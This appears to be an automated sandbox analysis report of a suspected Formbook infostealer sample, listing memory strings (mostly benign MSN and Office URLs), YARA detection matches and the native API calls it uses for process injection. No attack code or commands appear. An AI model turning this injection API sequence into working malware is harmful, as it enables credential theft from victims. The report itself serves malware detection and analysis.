Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/earnings/svg/light/blue.svg
Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Alert/Alert_AQ_Y.png
Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Alert/Alert_AQ_Y.svg
Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Alert/Alert_TH_Y.svg
Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/
Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/AAehwh2.png
Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/AAehwh2.svg
Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/
Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/Weather/W33_Clea
Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.coC
Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGB8
Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm
Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-dark
Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDrC
Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDrC-dark
Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHN8
Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHN8-dark
Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMkZ
Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMkZ-dark
Source: explorer.exe, 00000007.00000000.272431518007.00000000094D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRnR-dark
Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyym
Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyym-dark
Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://chachingqueen.com/save-on-electric-bills/#2_kill_energy_vampires_unplug_appliances_when_not_
Source: explorer.exe, 00000007.00000002.275191883367.00000000096D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272432020517.00000000096D8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000007.00000002.275199213617.000000000D7CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437830122.000000000D7CF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.comS
Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityiEA
Source: explorer.exe, 00000007.00000002.275191203436.00000000094D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.00000000094D0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA12I8qo.img
Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15YhMq.img
Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15spNo.img
Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1gKAgr.img
Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1iq0gq.img
Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1lLvot.img
Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1pycuu.img
Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKPPN8.img
Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAywOab.img
Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBph6Sm.img
Source: TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000649000.00000020.00000001.01000000.0000000B.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widgetonlockscreenwin10&cvid=6c321c39-81be-4f44-a39d-6068
Source: explorer.exe, 00000007.00000002.275199213617.000000000D7CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437830122.000000000D7CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275191883367.00000000096D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272432020517.00000000096D8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://people.com/jim-parsons-reprising-big-bang-theory-role-is-a-gift-exclusive-8647240
Source: explorer.exe, 00000007.00000002.275197435549.000000000D413000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272436256660.000000000D413000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comEM
Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wealthofgeeks.com/the-best-tv-anti-heroes/
Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000007.00000002.275198272389.000000000D5D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272436916001.000000000D5D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EXE.15
        Source: explorer.exe, 00000007.00000002.275199213617.000000000D7CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437830122.000000000D7CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275191883367.00000000096D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272432020517.00000000096D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.cbsnews.com/news/saying-goodbye-to-young-sheldon/
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.energy.gov/energysaver/why-energy-efficiency-matters
        Source: explorer.exe, 00000007.00000000.272431518007.00000000094FD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/e
        Source: explorer.exe, 00000007.00000002.275191203436.00000000094D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.00000000094D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/eP
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/entertainment/news/best-movies-now-on-netflix/ss-BB1qpNv8
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/entertainment/news/the-28-most-dazzling-red-carpet-beauty-looks-ever/ss-AA
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/entertainment/news/the-best-big-bang-theory-episode-of-all-time-according-
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/30-photos-of-super-nostalgic-things-that-ll-bring-ba
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/medical/the-slow-and-steady-growth-of-trilobites/ar-AA1lcBT3
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/wellness/actress-malinda-williams-recognized-for-films-like-soul-fo
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/yogapilates/biden-admin-can-t-force-electric-vehicle-goals-robert-w
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/cleaning-and-organizing/the-common-household-ingredient-that-can
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/another-popular-ice-cream-brand-files-for-chapter-11-bankr
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/elon-musk-s-strange-new-rule-for-x-employees-could-cause-t
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/i-m-an-economist-here-s-my-prediction-for-the-housing-mar
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/police-warn-aggressive-water-buffalo-has-been-on-the-loose-for-
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/new-trump-indictment-loses-some-allegations-related-to-jan-6
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/eight-seconds-KD
        Source: explorer.exe, 00000007.00000000.272431518007.00000000094FD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/farm-merge-valley/cg-9nf2hg8fnlts
        Source: explorer.exe, 00000007.00000003.272792772276.00000000095B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/idle-mining-
        Source: explorer.exe, 00000007.00000000.272431518007.00000000094FD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/play/games/rally-champion/cg-9pmdcq52j3hj
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/motorsports/travis-kelce-buys-an-ownership-stake-in-a-racehorse-nam
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/news/c
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/forecast/in-Washington%2CDistrict-of-Columbia?loc=eyJsIjoiV2FzaGlu
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/maps/airqualitystation/in-Washington%2CDistrict-of-Columbia?loc=ey
        Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/maps/severeweather/in-Washington%2CDistrict-of-Columbia?loc=eyJsIj
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.paramountpressexpress.com/cbs-entertainment/releases/?view=109387-cbs-orders-new-comedy-
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pollensense.com/
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://youtu.be/1uIizdaJhMI

        E-Banking Fraud

        barindex
        Source: Yara match | File source: 00000006.00000002.272502680086.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000002.272502162049.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.270972099407.0000000033830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Source: 00000006.00000002.272502680086.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000006.00000002.272502162049.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.270972099407.0000000033830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: initial sample | Static PE information: Filename: TRIAL_ORDER_CP.exe
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B534E0 NtCreateMutant, LdrInitializeThunk, 3_2_33B534E0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52B90 NtFreeVirtualMemory, LdrInitializeThunk, 3_2_33B52B90
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52BC0 NtQueryInformationToken, LdrInitializeThunk, 3_2_33B52BC0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52A80 NtClose, LdrInitializeThunk, 3_2_33B52A80
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52EB0 NtProtectVirtualMemory, LdrInitializeThunk, 3_2_33B52EB0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52D10 NtQuerySystemInformation, LdrInitializeThunk, 3_2_33B52D10
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B54260 NtSetContextThread, 3_2_33B54260
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B54570 NtSuspendThread, 3_2_33B54570
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52B80 NtCreateKey, 3_2_33B52B80
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52BE0 NtQueryVirtualMemory, 3_2_33B52BE0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52B20 NtQueryInformationProcess, 3_2_33B52B20
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52B10 NtAllocateVirtualMemory, 3_2_33B52B10
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52B00 NtQueryValueKey, 3_2_33B52B00
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52AA0 NtQueryInformationFile, 3_2_33B52AA0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52AC0 NtEnumerateValueKey, 3_2_33B52AC0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52A10 NtWriteFile, 3_2_33B52A10
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B529F0 NtReadFile, 3_2_33B529F0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B529D0 NtWaitForSingleObject, 3_2_33B529D0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B538D0 NtGetContextThread, 3_2_33B538D0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52FB0 NtSetValueKey, 3_2_33B52FB0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52F30 NtOpenDirectoryObject, 3_2_33B52F30
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52F00 NtCreateFile, 3_2_33B52F00
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52E80 NtCreateProcessEx, 3_2_33B52E80
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52ED0 NtResumeThread, 3_2_33B52ED0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52EC0 NtQuerySection, 3_2_33B52EC0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52E00 NtQueueApcThread, 3_2_33B52E00
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52E50 NtCreateSection, 3_2_33B52E50
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52DA0 NtReadVirtualMemory, 3_2_33B52DA0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52DC0 NtAdjustPrivilegesToken, 3_2_33B52DC0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52D50 NtWriteVirtualMemory, 3_2_33B52D50
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B53C90 NtOpenThread, 3_2_33B53C90
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52CF0 NtDelayExecution, 3_2_33B52CF0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52CD0 NtEnumerateKey, 3_2_33B52CD0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52C30 NtMapViewOfSection, 3_2_33B52C30
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B53C30 NtOpenProcessToken, 3_2_33B53C30
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52C20 NtSetInformationFile, 3_2_33B52C20
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52C10 NtOpenProcess, 3_2_33B52C10
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe | Code function: 3_2_33B52C50 NtUnmapViewOfSection, 3_2_33B52C50
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 5_2_04742877 SleepEx, NtResumeThread, 5_2_04742877
